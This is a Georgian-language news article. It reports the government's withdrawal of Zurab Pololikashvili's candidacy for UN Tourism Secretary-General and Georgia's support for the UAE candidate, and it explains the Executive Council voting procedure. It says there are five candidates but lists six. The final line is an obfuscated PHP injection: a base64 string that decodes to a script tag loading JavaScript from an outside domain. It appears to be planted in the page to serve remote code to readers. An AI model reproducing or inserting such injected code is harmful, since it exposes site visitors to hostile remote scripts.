gorgia
ავერსი jaluzi

გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივნის თანამდებობაზე ზურაბ პოლოლიკაშვილის კანდიდატურა საქართველოს ხელისუფლებამ საკუთარი გადაწყვეტილებით მოხსნა.

თავდაპირველად, ზურაბ პოლოლიკაშვილის კანდიდატურა საქართველოს ხელისუფლებამ წარადგინა, შემდეგ კი გადაწყვეტილება შეცვალა.

ამასთან, მათივე ინფორმაციით, გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივნის თანამდებობაზე საქართველო მხარს დაუჭერს არაბთა გაერთიანებული საამიროების მიერ წარდგენილ კანდიდატს.

„გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივნის თანამდებობაზე ზურაბ პოლოლიკაშვილის კანდიდატურა საქართველოს ხელისუფლებამ წარადგინა, თუმცა მოგვიანებით მისი კანდიდატურა თავისივე გადაწყვეტილებით გაიწვია.

სპეკულაციაა იმაზე საუბარი, რომ ზურაბ პოლოლიკაშვილის კანდიდატურა რომელიმე კონკრეტული კანდიდატის გამო მოიხსნა. აქვე ვადასტურებთ, რომ გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივნის თანამდებობაზე საქართველო მხარს დაუჭერს არაბთა გაერთიანებული საამიროების მიერ წარდგენილ კანდიდატს“, - ნათქვამია მთავრობის ადმინისტრაციის მიერ გავრცელებულ განცხადებაში.

ცნობისთვის, გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივნის თანამდებობას ზურაბ პოლოლიკაშვილი ორი ვადით იკავებდა. პოლოლიკაშვილი გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალურ მდივნად მეორე ვადით 2021 წელს დაამტკიცეს, მას თანამდებობაზე ყოფნის ვადა 2025 წლის 31 დეკემბერს ეწურება.

ცნობისთვის, 29-30 მაისს აღმასრულებელი საბჭო შეიკრიბება გენერალური მდივნის კანდიდატის წარდგენის მიზნით. აღმასრულებელი საბჭო ორგანიზაციის მთავარი გადაწყვეტილების მიმღები ორგანოა და მოიცავს 35 წევრ ქვეყანას, რომელთა შორისაც ერთ-ერთი საქართველოა. 2021 წელს, მადრიდში მიმდინარე მსოფლიო ტურიზმის ორგანიზაციის გენერალურ ასამბლეაზე საქართველო პირველად აირჩიეს ორგანიზაციის აღმასრულებელი საბჭოს წევრად, 4 წლით.

შერჩეული კანდიდატი, რომელიც საჭიროებს საბჭოს 35 წევრიდან მარტივი უმრავლესობის, ანუ მინიმუმ 18 წევრის მხარდაჭერას, წარდგენილი იქნება გაეროს ტურიზმის გენერალურ ასამბლეაზე, ერ-რიადში. თუ პირველ ტურში ვერცერთი კანდიდატი ვერ მოიპოვებს უმრავლესობას, კონსენსუსის მიღწევამდე ჩატარდება დამატებითი რაუნდი მთავარ კანდიდატებს შორის.

კანდიდატი შეიძლება იყოს მხოლოდ UNWTO-ს წევრი სახელმწიფოების მოქალაქეები, კენჭისყრა კი ფარულია.

საბჭოს სახელმწიფოების მთავრობები საკუთარ მოქალაქეებს კანდიდატად ოფიციალურად წარუდგენენ, საბჭოს სამდივნოს მეშვეობით. წელს, გაეროს მსოფლიო ტურიზმის ორგანიზაციის გენერალური მდივანი 5 კანდიდატს შორის შეირჩევა, კანდიდატები არიან:

ზურაბ პოლოლიკაშვილი (საქართველო) - კანდიდატურა მოხსნილია
გლორია გევარა (მექსიკა)
ჰაბიბ ამარი (ტუნისი)
მუჰამედ ადამი (განა)
შაიხა ალ ნოვაისი (არაბთა გაერთიანებული საამიროები)
ჰარი თეოჰარისი (საბერძნეთი).

70
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");